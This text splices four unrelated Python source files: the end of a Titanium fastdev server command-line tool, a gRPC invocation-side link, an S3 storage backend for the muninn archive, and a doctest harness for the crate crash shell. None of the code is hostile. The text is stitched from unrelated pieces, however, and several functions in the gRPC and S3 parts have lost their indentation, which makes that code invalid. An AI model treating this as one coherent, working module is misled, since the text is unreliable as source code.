                "within your Titanium project or specify the lock file with -l <lock file>" \
                % self.lock_file
            sys.exit(1)
        f = open(self.lock_file, 'r')
        self.data = simplejson.loads(f.read())
        f.close()
        self.port = self.data["port"]
        self.app_guid = self.data["app_guid"]
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((socket.gethostname(), self.port))
        send_tokens(self.socket, "script-handshake", self.app_guid)
        response = read_tokens(self.socket)[0]
        if response != "OK":
            print >>sys.stderr, "Error: Handshake was not accepted by the Fastdev server"
            sys.exit(1)
    def send(self, *tokens):
        """Send a framed command and return the framed reply tokens."""
        send_tokens(self.socket, *tokens)
        return read_tokens(self.socket)
    def close(self):
        self.socket.close()
def get_lock_file(dir, options):
    """Return the lock-file path: the -l option when given, otherwise
    <dir>/.fastdev.lock."""
    if options.lock_file is not None:
        return options.lock_file
    return os.path.join(dir, ".fastdev.lock")
def start_server(dir, options):
    """Start a fastdev server for the Titanium project in *dir*.

    Writes a .fastdev.lock file describing the server, then serves until
    shutdown, idle timeout, or Ctrl-C; the lock file is removed on exit.
    """
    xml = tiapp.TiAppXML(os.path.join(dir, "tiapp.xml"))
    app_id = xml.properties["id"]
    app_guid = xml.properties["guid"]
    lock_file = get_lock_file(dir, options)
    # An existing lock file is taken to mean a server is already up.
    if os.path.exists(lock_file):
        print "Fastdev server already running for %s" % app_id
        sys.exit(0)
    resources_dir = os.path.join(dir, 'Resources')
    FastDevHandler.resources_dir = resources_dir
    FastDevHandler.handshake = app_guid
    global server
    global idle_thread
    # Port 0 asks the OS for any free port; read the real one back below.
    server = ThreadingTCPServer(("", int(options.port)), FastDevHandler)
    port = server.server_address[1]
    logging.info("Serving up files for %s at 0.0.0.0:%d from %s" % (app_id, port, dir))
    f = open(lock_file, 'w+')
    f.write(simplejson.dumps({
        "ip": "0.0.0.0",
        "port": port,
        "dir": dir,
        "app_id": app_id,
        "app_guid": app_guid
    }))
    f.close()
    try:
        idle_thread = IdleThread(int(options.timeout))
        idle_thread.start()
        server.serve_forever()
    except KeyboardInterrupt, e:
        idle_thread.running = False
        server.shutdown_noblock()
        print "Terminated"
    logging.info("Fastdev server stopped.")
    os.unlink(lock_file)
def stop_server(dir, options):
    """Ask the running fastdev server for *dir* to shut down."""
    request = FastDevRequest(dir, options)
    print request.send("shutdown")[0]
    request.close()
    print "Fastdev server for %s stopped." % request.data["app_id"]
def kill_app(dir, options):
    """Kill the app attached to the fastdev server; True on success."""
    request = FastDevRequest(dir, options)
    result = request.send("kill-app")
    request.close()
    if result and result[0] == "OK":
        print "Killed app %s." % request.data["app_id"]
        return True
    else:
        print "Error killing app, result: %s" % result
        return False
def restart_app(dir, options):
    """Restart the app attached to the fastdev server; True on success."""
    request = FastDevRequest(dir, options)
    result = request.send("restart-app")
    request.close()
    if result and result[0] == "OK":
        print "Restarted app %s." % request.data["app_id"]
        return True
    else:
        print "Error restarting app, result: %s" % result
        return False
def is_running(dir):
    """Best-effort check whether a fastdev server is up for *dir*.

    Deliberately swallows all errors: an unreachable or half-dead server
    simply counts as "not running".
    """
    class Options(object): pass
    options = Options()
    options.lock_file = os.path.join(dir, '.fastdev.lock')
    if not os.path.exists(options.lock_file):
        return False
    try:
        request = FastDevRequest(dir, options)
        result = request.send("status")[0]
        request.close()
        status = simplejson.loads(result)
        return type(status) == dict
    except Exception, e:
        return False
def status(dir, options):
    """Print a human-readable status report for the server in *dir*."""
    lock_file = get_lock_file(dir, options)
    if lock_file == None or not os.path.exists(lock_file):
        print "No Fastdev servers running in %s" % dir
    else:
        data = simplejson.loads(open(lock_file, 'r').read())
        port = data["port"]
        try:
            request = FastDevRequest(dir, options)
            result = request.send("status")[0]
            request.close()
            status = simplejson.loads(result)
            print "Fastdev server running for app %s:" % data["app_id"]
            print "Port: %d" % port
            print "Uptime: %d sec" % status["uptime"]
            print "PID: %d" % status["pid"]
            print "Requests: %d" % status["request_count"]
        except Exception, e:
            # Stale lock file: the server it describes is gone.
            print >>sys.stderr, "Error: .fastdev.lock found in %s, but couldn't connect to the server on port %d: %s. Try manually deleting .fastdev.lock." % (dir, port, e)
def get_optparser():
    """Build the optparse OptionParser for the fastdev command line."""
    usage = """Usage: %prog [command] [options] [app-dir]

Supported Commands:
	start		start the fastdev server
	status		get the status of the fastdev server
	stop		stop the fastdev server
	restart-app	restart the app connected to this fastdev server
	kill-app	kill the app connected to this fastdev server
"""
    opt_parser = optparse.OptionParser(usage)
    opt_parser.add_option('-p', '--port', dest='port', default=0,
        help='port to bind the server to [default: first available port]')
    opt_parser.add_option('-t', '--timeout', dest='timeout', default=30 * 60,
        help='Timeout in seconds before the Fastdev server shuts itself down when it hasn\'t received a request [default: %default]')
    opt_parser.add_option('-l', '--lock-file', dest='lock_file', default=None,
        help='Path to the server lock file [default: app-dir/.fastdev.lock]')
    return opt_parser
def main():
    """Parse the command line and dispatch to the requested command."""
    parser = get_optparser()
    (options, args) = parser.parse_args()
    if len(args) == 0 or args[0] not in ['start', 'stop', 'kill-app', 'restart-app', 'status']:
        # parser.error already exits; the sys.exit below is a safety net.
        parser.error("Missing required command")
        sys.exit(1)
    command = args[0]
    # Default to the current directory; an optional second argument names
    # the project directory.
    dir = os.getcwd()
    if len(args) > 1:
        dir = os.path.expanduser(args[1])
        dir = os.path.abspath(dir)
    if command == "start":
        if not os.path.exists(os.path.join(dir, "tiapp.xml")):
            parser.error("Directory is not a Titanium Project: %s" % dir)
            sys.exit(1)
        try:
            start_server(dir, options)
        except Exception, e:
            print >>sys.stderr, "Error starting Fastdev server: %s" % e
    elif command == "stop":
        stop_server(dir, options)
    elif command == "kill-app":
        kill_app(dir, options)
    elif command == 'restart-app':
        restart_app(dir, options)
    elif command == "status":
        status(dir, options)

if __name__ == "__main__":
    main()
| |
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""The RPC-invocation-side bridge between RPC Framework and GRPC-on-the-wire."""
import abc
import enum
import logging
import threading
import time
from grpc._adapter import _intermediary_low
from grpc.framework.foundation import activated
from grpc.framework.foundation import logging_pool
from grpc.framework.foundation import relay
from grpc.framework.interfaces.links import links
# Default (de)serializer: pass payloads through unchanged.
_IDENTITY = lambda x: x
# Short aliases for the low-level completion-queue event kinds.
_STOP = _intermediary_low.Event.Kind.STOP
_WRITE = _intermediary_low.Event.Kind.WRITE_ACCEPTED
_COMPLETE = _intermediary_low.Event.Kind.COMPLETE_ACCEPTED
_READ = _intermediary_low.Event.Kind.READ_ACCEPTED
_METADATA = _intermediary_low.Event.Kind.METADATA_ACCEPTED
_FINISH = _intermediary_low.Event.Kind.FINISH
@enum.unique
class _Read(enum.Enum):
    """Read-side state of an in-flight RPC."""
    AWAITING_METADATA = 'awaiting metadata'
    READING = 'reading'
    AWAITING_ALLOWANCE = 'awaiting allowance'
    CLOSED = 'closed'
@enum.unique
class _HighWrite(enum.Enum):
    """Ticket-level (high) write state of an RPC."""
    OPEN = 'open'
    CLOSED = 'closed'
@enum.unique
class _LowWrite(enum.Enum):
    """Wire-level (low) write state of an RPC."""
    OPEN = 'OPEN'
    ACTIVE = 'ACTIVE'
    CLOSED = 'CLOSED'
class _RPCState(object):
    """Mutable per-RPC bookkeeping shared by ticket and event handlers."""
    def __init__(
        self, call, request_serializer, response_deserializer, sequence_number,
        read, allowance, high_write, low_write, due):
        self.call = call
        self.request_serializer = request_serializer
        self.response_deserializer = response_deserializer
        # Sequence number of the next ticket to emit for this RPC.
        self.sequence_number = sequence_number
        self.read = read                # _Read state machine value
        self.allowance = allowance      # payloads the local mate may still take
        self.high_write = high_write    # _HighWrite value
        self.low_write = low_write      # _LowWrite value
        self.due = due                  # set of event kinds still outstanding
def _no_longer_due(kind, rpc_state, key, rpc_states):
rpc_state.due.remove(kind)
if not rpc_state.due:
del rpc_states[key]
class _Kernel(object):
    """Invocation-side engine translating links.Tickets into low-level calls
    and completion-queue events back into tickets.

    All mutable state is guarded by self._lock; completion-queue events are
    consumed by a single _spin task running in self._pool.
    """
    def __init__(
        self, channel, host, metadata_transformer, request_serializers,
        response_deserializers, ticket_relay):
        self._lock = threading.Lock()
        self._channel = channel
        self._host = host
        self._metadata_transformer = metadata_transformer
        self._request_serializers = request_serializers
        self._response_deserializers = response_deserializers
        self._relay = ticket_relay
        # Created by start(); None also signals "stopped" to _spin.
        self._completion_queue = None
        self._rpc_states = {}
        self._pool = None
    def _on_write_event(self, operation_id, unused_event, rpc_state):
        """A queued write finished: complete the call if the high side is
        closed, otherwise relay a one-payload allowance ticket."""
        if rpc_state.high_write is _HighWrite.CLOSED:
            rpc_state.call.complete(operation_id)
            rpc_state.due.add(_COMPLETE)
            rpc_state.due.remove(_WRITE)
            rpc_state.low_write = _LowWrite.CLOSED
        else:
            # allowance=1: grant the local mate permission for one more payload.
            ticket = links.Ticket(
                operation_id, rpc_state.sequence_number, None, None, None, None, 1,
                None, None, None, None, None, None, None)
            rpc_state.sequence_number += 1
            self._relay.add_value(ticket)
            rpc_state.low_write = _LowWrite.OPEN
            _no_longer_due(_WRITE, rpc_state, operation_id, self._rpc_states)
    def _on_read_event(self, operation_id, event, rpc_state):
        """A read finished: relay the payload and, allowance permitting,
        start another read."""
        if event.bytes is None or _FINISH not in rpc_state.due:
            rpc_state.read = _Read.CLOSED
            _no_longer_due(_READ, rpc_state, operation_id, self._rpc_states)
        else:
            if 0 < rpc_state.allowance:
                rpc_state.allowance -= 1
                rpc_state.call.read(operation_id)
            else:
                rpc_state.read = _Read.AWAITING_ALLOWANCE
                _no_longer_due(_READ, rpc_state, operation_id, self._rpc_states)
            ticket = links.Ticket(
                operation_id, rpc_state.sequence_number, None, None, None, None, None,
                None, rpc_state.response_deserializer(event.bytes), None, None, None,
                None, None)
            rpc_state.sequence_number += 1
            self._relay.add_value(ticket)
    def _on_metadata_event(self, operation_id, event, rpc_state):
        """Initial metadata arrived: start the first read (spending the free
        allowance unit) and relay the metadata ticket."""
        if _FINISH in rpc_state.due:
            rpc_state.allowance -= 1
            rpc_state.call.read(operation_id)
            rpc_state.read = _Read.READING
            rpc_state.due.add(_READ)
            rpc_state.due.remove(_METADATA)
            ticket = links.Ticket(
                operation_id, rpc_state.sequence_number, None, None,
                links.Ticket.Subscription.FULL, None, None, event.metadata, None,
                None, None, None, None, None)
            rpc_state.sequence_number += 1
            self._relay.add_value(ticket)
        else:
            _no_longer_due(_METADATA, rpc_state, operation_id, self._rpc_states)
    def _on_finish_event(self, operation_id, event, rpc_state):
        """The RPC finished on the wire: map its status code to a ticket
        termination and relay the final ticket."""
        _no_longer_due(_FINISH, rpc_state, operation_id, self._rpc_states)
        if event.status.code is _intermediary_low.Code.OK:
            termination = links.Ticket.Termination.COMPLETION
        elif event.status.code is _intermediary_low.Code.CANCELLED:
            termination = links.Ticket.Termination.CANCELLATION
        elif event.status.code is _intermediary_low.Code.DEADLINE_EXCEEDED:
            termination = links.Ticket.Termination.EXPIRATION
        elif event.status.code is _intermediary_low.Code.UNKNOWN:
            termination = links.Ticket.Termination.LOCAL_FAILURE
        else:
            termination = links.Ticket.Termination.TRANSMISSION_FAILURE
        ticket = links.Ticket(
            operation_id, rpc_state.sequence_number, None, None, None, None, None,
            None, None, event.metadata, event.status.code, event.status.details,
            termination, None)
        rpc_state.sequence_number += 1
        self._relay.add_value(ticket)
    def _spin(self, completion_queue):
        """Event loop run in the pool: dispatch completion-queue events until
        stop() has been called and all RPCs have drained."""
        while True:
            event = completion_queue.get(None)
            with self._lock:
                rpc_state = self._rpc_states.get(event.tag, None)
                if event.kind is _STOP:
                    pass
                elif event.kind is _WRITE:
                    self._on_write_event(event.tag, event, rpc_state)
                elif event.kind is _METADATA:
                    self._on_metadata_event(event.tag, event, rpc_state)
                elif event.kind is _READ:
                    self._on_read_event(event.tag, event, rpc_state)
                elif event.kind is _FINISH:
                    self._on_finish_event(event.tag, event, rpc_state)
                elif event.kind is _COMPLETE:
                    _no_longer_due(_COMPLETE, rpc_state, event.tag, self._rpc_states)
                else:
                    logging.error('Illegal RPC event! %s', (event,))
                # A None queue means stop() ran; exit once no RPCs remain.
                if self._completion_queue is None and not self._rpc_states:
                    completion_queue.stop()
                    return
    def _invoke(
        self, operation_id, group, method, initial_metadata, payload, termination,
        timeout, allowance):
        """Invoke an RPC.

        Args:
          operation_id: Any object to be used as an operation ID for the RPC.
          group: The group to which the RPC method belongs.
          method: The RPC method name.
          initial_metadata: The initial metadata object for the RPC.
          payload: A payload object for the RPC or None if no payload was given at
            invocation-time.
          termination: A links.Ticket.Termination value or None indicated whether or
            not more writes will follow from this side of the RPC.
          timeout: A duration of time in seconds to allow for the RPC.
          allowance: The number of payloads (beyond the free first one) that the
            local ticket exchange mate has granted permission to be read.
        """
        if termination is links.Ticket.Termination.COMPLETION:
            high_write = _HighWrite.CLOSED
        elif termination is None:
            high_write = _HighWrite.OPEN
        else:
            # Any other termination kind aborts the invocation outright.
            return
        transformed_initial_metadata = self._metadata_transformer(initial_metadata)
        request_serializer = self._request_serializers.get(
            (group, method), _IDENTITY)
        response_deserializer = self._response_deserializers.get(
            (group, method), _IDENTITY)
        call = _intermediary_low.Call(
            self._channel, self._completion_queue, '/%s/%s' % (group, method),
            self._host, time.time() + timeout)
        if transformed_initial_metadata is not None:
            for metadata_key, metadata_value in transformed_initial_metadata:
                call.add_metadata(metadata_key, metadata_value)
        call.invoke(self._completion_queue, operation_id, operation_id)
        if payload is None:
            if high_write is _HighWrite.CLOSED:
                call.complete(operation_id)
                low_write = _LowWrite.CLOSED
                due = set((_METADATA, _COMPLETE, _FINISH,))
            else:
                low_write = _LowWrite.OPEN
                due = set((_METADATA, _FINISH,))
        else:
            call.write(request_serializer(payload), operation_id)
            low_write = _LowWrite.ACTIVE
            due = set((_WRITE, _METADATA, _FINISH,))
        self._rpc_states[operation_id] = _RPCState(
            call, request_serializer, response_deserializer, 0,
            _Read.AWAITING_METADATA, 1 if allowance is None else (1 + allowance),
            high_write, low_write, due)
    def _advance(self, operation_id, rpc_state, payload, termination, allowance):
        """Apply a follow-up (non-initial) ticket to an in-flight RPC."""
        if payload is not None:
            rpc_state.call.write(rpc_state.request_serializer(payload), operation_id)
            rpc_state.low_write = _LowWrite.ACTIVE
            rpc_state.due.add(_WRITE)
        if allowance is not None:
            if rpc_state.read is _Read.AWAITING_ALLOWANCE:
                # One unit is spent immediately restarting the read.
                rpc_state.allowance += allowance - 1
                rpc_state.call.read(operation_id)
                rpc_state.read = _Read.READING
                rpc_state.due.add(_READ)
            else:
                rpc_state.allowance += allowance
        if termination is links.Ticket.Termination.COMPLETION:
            rpc_state.high_write = _HighWrite.CLOSED
            if rpc_state.low_write is _LowWrite.OPEN:
                rpc_state.call.complete(operation_id)
                rpc_state.due.add(_COMPLETE)
                rpc_state.low_write = _LowWrite.CLOSED
        elif termination is not None:
            rpc_state.call.cancel()
    def add_ticket(self, ticket):
        """Entry point for tickets from the joined link (thread-safe)."""
        with self._lock:
            if ticket.sequence_number == 0:
                if self._completion_queue is None:
                    logging.error('Received invocation ticket %s after stop!', ticket)
                else:
                    self._invoke(
                        ticket.operation_id, ticket.group, ticket.method,
                        ticket.initial_metadata, ticket.payload, ticket.termination,
                        ticket.timeout, ticket.allowance)
            else:
                rpc_state = self._rpc_states.get(ticket.operation_id)
                if rpc_state is not None:
                    self._advance(
                        ticket.operation_id, rpc_state, ticket.payload,
                        ticket.termination, ticket.allowance)
    def start(self):
        """Starts this object.

        This method must be called before attempting to exchange tickets with this
        object.
        """
        with self._lock:
            self._completion_queue = _intermediary_low.CompletionQueue()
            self._pool = logging_pool.pool(1)
            self._pool.submit(self._spin, self._completion_queue)
    def stop(self):
        """Stops this object.

        This method must be called for proper termination of this object, and no
        attempts to exchange tickets with this object may be made after this method
        has been called.
        """
        with self._lock:
            if not self._rpc_states:
                self._completion_queue.stop()
            # Setting the queue to None tells _spin to exit once the
            # outstanding RPCs drain.
            self._completion_queue = None
            pool = self._pool
        pool.shutdown(wait=True)
class InvocationLink(links.Link, activated.Activated):
    """A links.Link for use on the invocation-side of a gRPC connection.

    Implementations of this interface are only valid for use when activated.
    """
    # Python 2-style abstract base class declaration.
    __metaclass__ = abc.ABCMeta
class _InvocationLink(InvocationLink):
    """Concrete InvocationLink backed by a _Kernel and a ticket relay."""
    def __init__(
        self, channel, host, metadata_transformer, request_serializers,
        response_deserializers):
        # The relay decouples kernel event threads from the joined link.
        self._relay = relay.relay(None)
        self._kernel = _Kernel(
            channel, host,
            _IDENTITY if metadata_transformer is None else metadata_transformer,
            {} if request_serializers is None else request_serializers,
            {} if response_deserializers is None else response_deserializers,
            self._relay)
    def _start(self):
        # Relay first so kernel-emitted tickets have somewhere to go.
        self._relay.start()
        self._kernel.start()
        return self
    def _stop(self):
        # Reverse order of _start.
        self._kernel.stop()
        self._relay.stop()
    def accept_ticket(self, ticket):
        """See links.Link.accept_ticket for specification."""
        self._kernel.add_ticket(ticket)
    def join_link(self, link):
        """See links.Link.join_link for specification."""
        self._relay.set_behavior(link.accept_ticket)
    def __enter__(self):
        """See activated.Activated.__enter__ for specification."""
        return self._start()
    def __exit__(self, exc_type, exc_val, exc_tb):
        """See activated.Activated.__exit__ for specification."""
        self._stop()
        return False
    def start(self):
        """See activated.Activated.start for specification."""
        return self._start()
    def stop(self):
        """See activated.Activated.stop for specification."""
        self._stop()
def invocation_link(
    channel, host, metadata_transformer, request_serializers,
    response_deserializers):
    """Creates an InvocationLink.

    Args:
      channel: An _intermediary_low.Channel for use by the link.
      host: The host to specify when invoking RPCs.
      metadata_transformer: A callable that takes an invocation-side initial
        metadata value and returns another metadata value to send in its place.
        May be None.
      request_serializers: A dict from group-method pair to request object
        serialization behavior.
      response_deserializers: A dict from group-method pair to response object
        deserialization behavior.

    Returns:
      An InvocationLink.
    """
    link = _InvocationLink(
        channel, host, metadata_transformer, request_serializers,
        response_deserializers)
    return link
| |
import json
import logging
import os
from .base import StorageBackend
from muninn.schema import Mapping, Text, Integer
import muninn.config as config
import muninn.util as util
from muninn.exceptions import Error, StorageError
import boto3
import boto3.s3
import botocore
logging.getLogger("boto3").setLevel(logging.CRITICAL)
class _S3Config(Mapping):
    """Schema for the 's3' section of the muninn archive configuration."""
    _alias = "s3"
    host = Text()
    port = Integer()
    bucket = Text()
    access_key = Text()
    secret_access_key = Text()
    region = Text(optional=True)
    prefix = Text(optional=True)   # key prefix under which all objects are stored
    tmp_root = Text(optional=True) # local scratch directory for transfers
    download_args = Text(optional=True) # JSON representation of boto3 download_file ExtraArgs parameter
    upload_args = Text(optional=True) # JSON representation of boto3 upload_file ExtraArgs parameter
    copy_args = Text(optional=True) # JSON representation of boto3 copy ExtraArgs parameter
    transfer_config = Text(optional=True) # JSON representation of boto3.s3.transfer.TransferConfig parameters
def create(configuration):
    """Instantiate an S3StorageBackend from the parsed 's3' config section."""
    section = configuration.get("s3", {})
    options = config.parse(section, _S3Config)
    _S3Config.validate(options)
    return S3StorageBackend(**options)
class S3StorageBackend(StorageBackend): # TODO '/' in keys to indicate directory, 'dir/' with contents?
    def __init__(self, bucket, host, port, access_key, secret_access_key, region=None, prefix='', tmp_root=None,
                 download_args=None, upload_args=None, copy_args=None, transfer_config=None):
        """Configure the backend and create the boto3 S3 resource.

        The *_args parameters are JSON strings decoded into boto3
        ExtraArgs / TransferConfig settings.
        """
        super(S3StorageBackend, self).__init__()
        self.bucket = bucket
        # Normalize the key prefix so joins below never double up '/'.
        if prefix and not prefix.endswith('/'):
            prefix += '/'
        self._prefix = prefix
        if port == 80:
            export_port = ''
        else:
            export_port = ':%d' % port
        # NOTE(review): URLs are hard-coded to http (here and in
        # endpoint_url below) -- confirm https endpoints are not needed.
        self.global_prefix = os.path.join('http://%s%s/%s' % (host, export_port, bucket), prefix)
        self._root = bucket
        if tmp_root:
            tmp_root = os.path.realpath(tmp_root)
            util.make_path(tmp_root)
        self._tmp_root = tmp_root
        self._resource = boto3.resource(
            service_name='s3',
            region_name=region,
            aws_access_key_id=access_key,
            aws_secret_access_key=secret_access_key,
            endpoint_url='http://%s:%s' % (host, port),
        )
        self._download_args = None
        if download_args:
            self._download_args = json.loads(download_args)
        self._upload_args = None
        if upload_args:
            self._upload_args = json.loads(upload_args)
        self._copy_args = None
        if copy_args:
            self._copy_args = json.loads(copy_args)
        if transfer_config:
            self._transfer_config = boto3.s3.transfer.TransferConfig(**json.loads(transfer_config))
        else:
            self._transfer_config = boto3.s3.transfer.TransferConfig()
def _bucket_exists(self):
try:
self._resource.meta.client.head_bucket(Bucket=self.bucket)
return True
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == "404":
return False
else:
raise
def _prefix_exists(self):
if self._prefix: # TODO created but still empty archive
objs = list(self._resource.Bucket(self.bucket).objects.limit(count=1).filter(Prefix=self._prefix))
return len(objs) == 1
else:
return True
def prepare(self):
if not self._bucket_exists():
self._resource.create_bucket(Bucket=self.bucket)
def exists(self):
return self._bucket_exists() and self._prefix_exists()
    def destroy(self):
        """Remove the archive: delete everything under the prefix, or --
        when no prefix is configured -- empty and delete the whole bucket."""
        if self._prefix:
            self._resource.Bucket(self.bucket).objects.filter(Prefix=self._prefix).delete()
        elif self._bucket_exists():
            bucket = self._resource.Bucket(self.bucket)
            bucket.objects.all().delete()
            bucket.delete()
def product_path(self, product): # TODO needed?
return os.path.join(product.core.archive_path, product.core.physical_name)
    def current_archive_path(self, paths):
        # Ingesting in place is a filesystem-only concept; unsupported on S3.
        raise Error("S3 storage backend does not support ingesting already archived products")
    def _upload_file(self, key, path):
        """Upload the local file at ``path`` to ``key`` in the bucket."""
        obj = self._resource.Object(self.bucket, key)
        # Zero-byte files are stored with a plain put() as a workaround.
        if os.path.getsize(path) == 0:  # TODO otherwise upload_file hangs sometimes!?
            self._resource.Object(self.bucket, key).put()
        else:
            obj.upload_file(path, ExtraArgs=self._upload_args, Config=self._transfer_config)
    def _create_dir(self, key):
        """Create an empty 'directory' marker object (key with a trailing slash)."""
        # using put, as upload_file/upload_fileobj do not like the trailing slash
        self._resource.Object(self.bucket, key+'/').put()
    def put(self, paths, properties, use_enclosing_directory, use_symlinks=None,
            retrieve_files=None, run_for_product=None):
        """Store product file(s)/directory(ies) under prefix + archive_path/physical_name.

        ``retrieve_files``, when given, is called with a temporary directory
        and must return the local paths to upload.  Any failure is wrapped in
        a StorageError that records whether anything was already written
        (``anything_stored``), so the caller can decide about cleanup.
        """
        if use_symlinks:
            raise Error("S3 storage backend does not support symlinks")
        anything_stored = False
        try:
            archive_path = properties.core.archive_path
            physical_name = properties.core.physical_name
            # Without an enclosing directory there must be exactly one path,
            # named after the product itself.
            if not use_enclosing_directory and retrieve_files is None:
                assert(len(paths) == 1 and os.path.basename(paths[0]) == physical_name)
            tmp_root = self.get_tmp_root(properties)
            with util.TemporaryDirectory(dir=tmp_root, prefix=".put-",
                                         suffix="-%s" % properties.core.uuid.hex) as tmp_path:
                if retrieve_files:
                    paths = retrieve_files(tmp_path)
                # Upload file(s)
                for path in paths:
                    key = self._prefix + os.path.join(archive_path, physical_name)
                    # Add enclosing dir
                    if use_enclosing_directory:
                        key = os.path.join(key, os.path.basename(path))
                    if os.path.isdir(path):
                        # Recreate the directory tree: one marker object per
                        # directory plus one object per file.
                        self._create_dir(key)
                        anything_stored = True
                        for root, subdirs, files in os.walk(path):
                            rel_root = os.path.relpath(root, path)
                            for subdir in subdirs:
                                dirkey = os.path.normpath(os.path.join(key, rel_root, subdir))
                                self._create_dir(dirkey)
                                anything_stored = True
                            for filename in files:
                                filekey = os.path.normpath(os.path.join(key, rel_root, filename))
                                filepath = os.path.join(root, filename)
                                self._upload_file(filekey, filepath)
                                anything_stored = True
                    else:
                        self._upload_file(key, path)
                        anything_stored = True
                if run_for_product is not None:
                    run_for_product(paths)
        except Exception as e:
            raise StorageError(e, anything_stored)
    def get(self, product, product_path, target_path, use_enclosing_directory, use_symlinks=None):
        """Download all objects of a product into ``target_path``.

        Keys ending in '/' are directory markers and become local directories.
        Raises Error when no object exists for the product.
        """
        if use_symlinks:
            raise Error("S3 storage backend does not support symlinks")
        archive_path = product.core.archive_path
        prefix = self._prefix + product_path
        objs = list(self._resource.Bucket(self.bucket).objects.filter(Prefix=prefix))
        if not objs:
            raise Error("no data for product '%s' (%s)" % (product.core.product_name, product.core.uuid))
        for obj in objs:
            rel_path = os.path.relpath(obj.key, self._prefix + archive_path)
            # Drop the leading enclosing-directory component from the local path.
            if use_enclosing_directory:
                rel_path = '/'.join(rel_path.split('/')[1:])
            target = os.path.normpath(os.path.join(target_path, rel_path))
            if obj.key.endswith('/'):
                util.make_path(target)
            else:
                util.make_path(os.path.dirname(target))
                self._resource.Object(self.bucket, obj.key).download_file(target, ExtraArgs=self._download_args,
                                                                          Config=self._transfer_config)
def delete(self, product_path, properties):
prefix = self._prefix + product_path
for obj in self._resource.Bucket(self.bucket).objects.filter(Prefix=prefix):
obj.delete()
def size(self, product_path):
total = 0
prefix = self._prefix + product_path
for obj in self._resource.Bucket(self.bucket).objects.filter(Prefix=prefix):
total += obj.size
return total
    def move(self, product, archive_path, paths=None):
        """Move a product to a new archive path via server-side copy + delete."""
        # Ignore if product already there
        if product.core.archive_path == archive_path:
            return paths
        product_path = self._prefix + self.product_path(product)
        new_product_path = self._prefix + os.path.join(archive_path, product.core.physical_name)
        objs = list(self._resource.Bucket(self.bucket).objects.filter(Prefix=product_path))
        if not objs:
            raise Error("no data for product '%s' (%s)" % (product.core.product_name, product.core.uuid))
        for obj in objs:
            new_key = os.path.normpath(os.path.join(new_product_path, os.path.relpath(obj.key, product_path)))
            # Copy first, then delete, so a mid-move failure never loses data.
            self._resource.Object(self.bucket, new_key).copy(CopySource={'Bucket': self.bucket, 'Key': obj.key},
                                                             ExtraArgs=self._copy_args, Config=self._transfer_config)
            self._resource.Object(self.bucket, obj.key).delete()
        return paths
| |
import unittest
import doctest
import zc.customdoctests
from crate.testing.layer import CrateLayer
import os
import shutil
import re
from . import process_test
from .paths import crate_path, project_path
from .ports import GLOBAL_PORT_POOL
from crate.crash.command import CrateCmd
from crate.crash.printer import PrintWrapper, ColorPrinter
from crate.client import connect
# Ports reserved for the test Crate instance, drawn from a shared pool to
# avoid clashing with a real server on the default 4200/4300.
CRATE_HTTP_PORT = GLOBAL_PORT_POOL.get()
CRATE_TRANSPORT_PORT = GLOBAL_PORT_POOL.get()
class CrateTestCmd(CrateCmd):
    """Crash command wrapper whose output is routed through doctest's stdout."""

    def __init__(self, **kwargs):
        super(CrateTestCmd, self).__init__(**kwargs)
        stream = PrintWrapper()
        self.logger = ColorPrinter(False, stream=stream, line_end='\n')

    def stmt(self, stmt):
        """Run one statement; backslash-prefixed input is a crash command."""
        stmt = stmt.replace('\n', ' ')
        if stmt.startswith('\\'):
            self.process(stmt)
        else:
            self.execute(stmt)

cmd = CrateTestCmd(is_tty=False)
def wait_for_schema_update(schema, table, column):
    """Poll information_schema until the given column becomes visible."""
    conn = connect('localhost:' + str(CRATE_HTTP_PORT))
    cursor = conn.cursor()
    count = 0
    while count == 0:
        cursor.execute(('select count(*) from information_schema.columns '
                        'where schema_name = ? and table_name = ? '
                        'and column_name = ?'),
                       (schema, table, column))
        count = cursor.fetchone()[0]
def bash_transform(s):
    """Turn a doc shell example into executable test code.

    The docs show the real port '4200' to a reader; the test server listens on
    a pool port, so the port is rewritten before the example runs.  ``crash``
    invocations become ``cmd.stmt`` calls; anything else runs via subprocess.
    """
    s = s.replace(':4200/', ':{0}/'.format(CRATE_HTTP_PORT))
    if not s.startswith("crash"):
        return (
            r'import subprocess;'
            r'print(subprocess.check_output(r"""%s""",stderr=subprocess.STDOUT,shell=True).decode("utf-8"))' % s) + '\n'
    statement = re.search(r"crash\s+-c\s+\"(.*?)\"", s).group(1)
    return u'cmd.stmt({0})'.format(repr(statement.strip().rstrip(';')))
def crash_transform(s):
    """Turn a doc crash example into a ``cmd.stmt`` call on the test port.

    A leading underscore marks literal python code to be executed as-is.
    """
    if s.startswith('_'):
        return s[1:]
    rewritten = s.replace(':4200', ':{0}'.format(CRATE_HTTP_PORT))
    return u'cmd.stmt({0})'.format(repr(rewritten.strip().rstrip(';')))
# Doctest parsers: 'sh$' prompts run through bash_transform, 'cr>' prompts
# through crash_transform.
